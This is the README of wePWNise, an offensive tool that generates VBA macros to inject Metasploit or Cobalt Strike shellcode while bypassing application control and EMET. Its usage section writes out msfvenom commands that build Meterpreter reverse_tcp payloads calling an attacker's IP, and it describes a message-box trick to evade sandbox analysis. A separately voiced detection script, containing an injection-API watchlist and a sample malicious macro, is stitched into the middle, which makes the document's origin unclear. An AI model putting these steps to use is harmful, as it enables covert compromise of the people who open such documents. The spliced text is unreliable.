WePWNise generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software.

wePWNise

wePWNise is a proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind, targeting locked-down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit, Cobalt Strike) and it also accepts any custom payload in raw format.

Prerequisites

  • Python termcolor package. To install run: pip install termcolor

Command line arguments

To start using wePWNise, first take a look at the options it supports:

usage: wepwnise.py [-h] -i86 <x86_shellcode> -i64 <x64_shellcode> [--inject64]
                   [--out <output_file>] [--msgbox] [--msg <window_message>]

optional arguments:
  -h, --help            show this help message and exit
  -i86 <x86_shellcode>  Input x86 raw shellcode
  -i64 <x64_shellcode>  Input x64 raw shellcode
  --inject64            Inject into 64 Bit. Set to False when delivering x86
                        payloads only. Default is True
  --out <output_file>   File to output the VBA macro to
  --msgbox              Present messagebox to prevent automated analysis.
                        Default is True.
  --msg <window_message>
                        Custom message to present the victim if --msgbox is
                        set to True

wePWNise requires both 32-bit and 64-bit raw payloads in order to be able to deliver the appropriate type when it lands on an unknown target. However, if only an x86 architecture is targeted, a dummy 64-bit payload must be provided to replace the missing code.

In order to defeat certain automated analysis configurations, a message box opens upon execution of the code. The text of the message box can be altered by defining its value in the --msg parameter. To disable this functionality set the --msgbox parameter to False.

Due to performance conditions that may be introduced as a result of long SRP/EMET policies, wePWNise reads two configuration files (binary-paths.txt and directory-paths.txt) that contain a list of executables and directories which are less likely to be monitored and which are checked first. By editing the contents of those files the user can define their own choices instead. If the files are empty, wePWNise will directly start reading the SRP/EMET policies as they are defined within the Registry and make its injection choice purely based on the retrieved information.
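The README above describes three traits of the generated macros: Win32 API declarations used to inject a payload, architecture-independent code, and a message box shown before execution to defeat automated analysis. As an added defender-side illustration (not code from wePWNise or its README), the following static triage flags exactly those traits in extracted VBA source; the API watchlist and the sample macro fragment are constructed assumptions for this example.

```python
import re
from dataclasses import dataclass, field

# Win32 imports a macro only needs to place and run code in a process.
# Assumed watchlist for this example, not taken from wePWNise.
INJECTION_APIS = {"VirtualAlloc", "VirtualAllocEx", "RtlMoveMemory",
                  "WriteProcessMemory", "CreateThread", "CreateRemoteThread"}

DECLARE_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?Declare\s+(?:PtrSafe\s+)?"
                        r"(?:Function|Sub)\s+(\w+)", re.I | re.M)
ARCH_RE = re.compile(r"^\s*#If\s+(?:Win64|VBA7)\b", re.I | re.M)   # arch-independent macros
MSGBOX_RE = re.compile(r"\bMsgBox\b", re.I)                         # sandbox-evasion gate

@dataclass
class MacroTriage:
    flagged_apis: set = field(default_factory=set)  # declared injection-capable APIs
    arch_branching: bool = False                    # #If Win64 / #If VBA7 present
    msgbox_gated: bool = False                      # MsgBox runs before first API call

    def suspicious(self) -> bool:
        return bool(self.flagged_apis)

def triage_vba(src: str) -> MacroTriage:
    t = MacroTriage()
    t.flagged_apis = {n for n in DECLARE_RE.findall(src) if n in INJECTION_APIS}
    t.arch_branching = ARCH_RE.search(src) is not None
    seen_msgbox = False
    for line in src.splitlines():
        if DECLARE_RE.match(line):
            continue  # a declaration is not a call
        if MSGBOX_RE.search(line):
            seen_msgbox = True
        if any(re.search(rf"\b{api}\s*\(", line) for api in t.flagged_apis):
            t.msgbox_gated = seen_msgbox  # the gate only counts if it precedes the call
            break
    return t

# Constructed sample (parameter lists shortened); not real wePWNise output.
SAMPLE_MACRO = """#If VBA7 Then
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal a As LongPtr) As LongPtr
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal a As LongPtr) As LongPtr
#Else
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal a As Long) As Long
#End If
Sub AutoOpen()
    MsgBox "This document was created in a newer version of Office."
    buf = VirtualAlloc(0)
End Sub
"""
```

Run it over source extracted from a document (for example with a macro-extraction tool) and treat `suspicious()` together with `msgbox_gated` as a reason to detonate the sample with the dialog auto-dismissed rather than to trust a clean sandbox verdict.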

Usage examples

The following sections describe some basic usage examples of wePWNise.

Metasploit payloads

First generate the payloads for both x86 and x64 architectures in raw format and ensure that the Metasploit listeners are configured appropriately.

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.raw

Then point wePWNise to the generated payloads and direct the output to msf_wepwn.txt.

$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt

Cobalt Strike payloads

To generate a raw payload in Cobalt Strike, navigate to the following menu and from the Output dropdown select the Raw format. Repeat the process and enable the x64 checkbox to produce a 64-bit payload.

Attacks > Packages > Payload Generator

Enter the generated payloads into wePWNise to generate the VBA code.

$ wepwnise.py -i86 /payloads/cs86.raw -i64 /payloads/cs64.raw --msgbox False --out /payloads/cs_wepwn.txt

Custom payloads

In certain cases only an x86 payload may be available. As wePWNise expects both a 32-bit and a 64-bit payload, create a dummy 64-bit file and set the --inject64 parameter to False in order to disable 64-bit injection.

$ echo "+" > /payloads/dummy64.raw
$ wepwnise.py -i86 /payloads/custom.raw  -i64 /payloads/dummy64.raw --inject64 False --out /payloads/wepwn86.txt

Similarly, to generate 64-bit payloads only, create a dummy x86 file and supply it in wePWNise's -i86 command line parameter.

License

wePWNise is released under a 3-clause BSD License and maintained by MWR InfoSecurity.

Credits

This tool was originally developed by Vincent Yiu (@vysecurity).
